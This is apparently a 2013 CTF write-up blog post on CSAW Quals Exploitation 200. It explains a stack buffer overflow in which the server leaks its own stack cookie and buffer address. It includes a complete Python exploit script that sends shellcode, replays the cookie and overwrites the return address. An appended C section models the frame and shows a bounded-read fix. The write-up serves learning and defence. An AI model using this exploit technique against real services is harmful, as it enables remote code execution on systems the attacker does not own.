Monday, September 23, 2013

CSAW CTF Quals: Exploitation 200

This binary required using the memory location of the buffer and a secret, both of which were sent across the socket. The stack canary being checked was the value of the secret that they sent. The important code is shown below.
  unsigned int v1;
  char buffer[2048]; 
  unsigned int cookie; 

  cookie = 0;
  memset(buffer, 0, sizeof(buffer));
  v1 = time(0);
  srand(v1);
  secret = rand();
  cookie = secret;
  *(_DWORD *)buffer = buffer;
  send(newsock, buffer, 4u, 0);
  send(newsock, &cookie, 4u, 0);
  send(
    newsock,
    "Welcome to CSAW CTF.  Exploitation 2 will be a little harder this year.  Insert your exploit here:",
    0x63u,
    0);
  recv(newsock, buffer, 0x1000u, 0);
  buffer[2047] = 0;
  if ( cookie != secret )
  {
    close(newsock);
    exit(0);
  }
After sending a couple of strings composed entirely of the cookie, I was able to determine that the canary was located 2048 bytes into the buffer, with control of eip taken at 2064 bytes. With control of eip, we jump to the address of the beginning of the buffer we received, which conveniently holds our shellcode. The following code is the script used to beat the challenge.
import socket
import binascii

# create an INET, STREAMing socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# connect to the challenge server on port 31338
#s.connect(("10.18.0.85", 31338))
s.connect(("128.238.66.212", 31338))

# the 94-byte shellcode lives in the file "callback"
f = open("callback", "r")
exploit = f.read(94)
print(len(exploit))
print(binascii.hexlify(exploit))

# the server sends the buffer address and the cookie before its banner
buffer_addr = s.recv(4)
cookie = s.recv(4)
print("got buffer")
print(binascii.hexlify(buffer_addr))
print("got cookie")
print(binascii.hexlify(cookie))
print(s.recv(256))

# pad the shellcode out to the canary offset (2048 bytes)
exploit += 'A' * (2048 - 94)
print("len is now 2048?")
print(len(exploit))
# keep the canary check passing with the leaked cookie, then overwrite
# the saved return address (2064 bytes in) with the buffer address
exploit += cookie
exploit += buffer_addr
exploit += buffer_addr
exploit += buffer_addr
exploit += buffer_addr
s.send(exploit)

# read whatever the server sends back after the payload
buffer_addr = s.recv(4)
cookie = s.recv(4)
print("got buffer")
print(binascii.hexlify(buffer_addr))
print("got cookie")
print(binascii.hexlify(cookie))
print(s.recv(256))
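As an added illustration from the defensive side (not code from the original post or the challenge), the handler's frame is rebuilt below as a struct with the offsets from the writeup, so the oversized recv can be observed landing on the cookie at 2048 and the saved return address at 2064, next to the bounded read that prevents it. The recv stand-in, the secret and the return address value are constructed for the example.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Stack frame of the decompiled handler, reproduced as a struct so the
 * overflow can be observed in memory instead of by crashing. Offsets match
 * the writeup: cookie at 2048, saved return address at 2064. */
struct frame {
    char     buffer[2048];
    uint32_t cookie;        /* the "canary": the secret the server sends out */
    uint32_t saved[3];      /* other saved state between cookie and eip */
    uint32_t ret;           /* saved return address */
    char     slack[0x1000]; /* keeps an oversized copy inside this object */
};
_Static_assert(offsetof(struct frame, cookie) == 2048, "cookie offset");
_Static_assert(offsetof(struct frame, ret) == 2064, "ret offset");

/* Constructed stand-in for recv(): copies min(want, req_len) bytes of an
 * in-memory request, as a socket read of a client-sized message would. */
static size_t fake_recv(char *dst, size_t want, const char *req, size_t req_len) {
    size_t n = want < req_len ? want : req_len;
    memcpy(dst, req, n);
    return n;
}

/* Original pattern: recv(newsock, buffer, 0x1000u, 0) into a 2048-byte
 * buffer. Returns 1 only if the cookie check would still pass. */
int handle_original(struct frame *f, uint32_t secret, const char *req, size_t req_len) {
    memset(f, 0, sizeof *f);
    f->cookie = secret;
    f->ret = 0x08048000u;                         /* constructed placeholder */
    fake_recv((char *)f, 0x1000u, req, req_len);  /* 0x1000 > sizeof buffer */
    f->buffer[2047] = 0;
    return f->cookie == secret;
}

/* Hardened pattern: bound the read by the buffer, leave room for the NUL,
 * and never write outside buffer[]. A real fix would also stop sending the
 * cookie and the buffer address to the client, which this frame omits. */
int handle_bounded(struct frame *f, uint32_t secret, const char *req, size_t req_len) {
    memset(f, 0, sizeof *f);
    f->cookie = secret;
    f->ret = 0x08048000u;
    size_t n = fake_recv(f->buffer, sizeof f->buffer - 1, req, req_len);
    f->buffer[n] = 0;
    return f->cookie == secret;
}
```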

Feel free to comment or ask questions!

-- Imp3rial
